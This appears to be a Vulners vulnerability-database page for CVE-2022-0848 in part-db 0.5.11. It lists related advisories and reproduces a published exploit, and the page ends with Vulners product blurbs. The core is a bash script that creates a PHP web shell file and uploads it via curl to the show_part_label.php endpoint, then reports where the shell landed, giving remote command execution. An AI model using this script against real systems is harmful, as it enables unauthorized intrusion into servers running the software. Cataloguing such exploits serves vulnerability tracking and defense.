| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Part-Db_Project Part-Db | 11 Mar 202207:26 | – | githubexploit | |
| part-db 0.5.11 - Remote Code Execution Exploit | 7 Mar 202200:00 | – | zdt | |
| OS Command Injection in part-db/part-db | 15 Feb 202211:36 | – | huntr | |
| part-db 操作系统命令注入漏洞 | 4 Mar 202200:00 | – | cnnvd | |
| Part-DB Project Unrestricted File Upload (CVE-2022-0848) | 10 Nov 202200:00 | – | checkpoint_advisories | |
| CVE-2022-0848 | 4 Mar 202208:25 | – | cve | |
| CVE-2022-0848 OS Command Injection in part-db/part-db | 4 Mar 202208:25 | – | cvelist | |
| CVE-2022-0848 | 4 Mar 202209:15 | – | nvd | |
| CVE-2022-0848 OS Command Injection in part-db/part-db | 4 Mar 202208:25 | – | osv | |
| part-db 0.5.11 Remote Code Execution | 7 Mar 202200:00 | – | packetstorm |
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------
#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation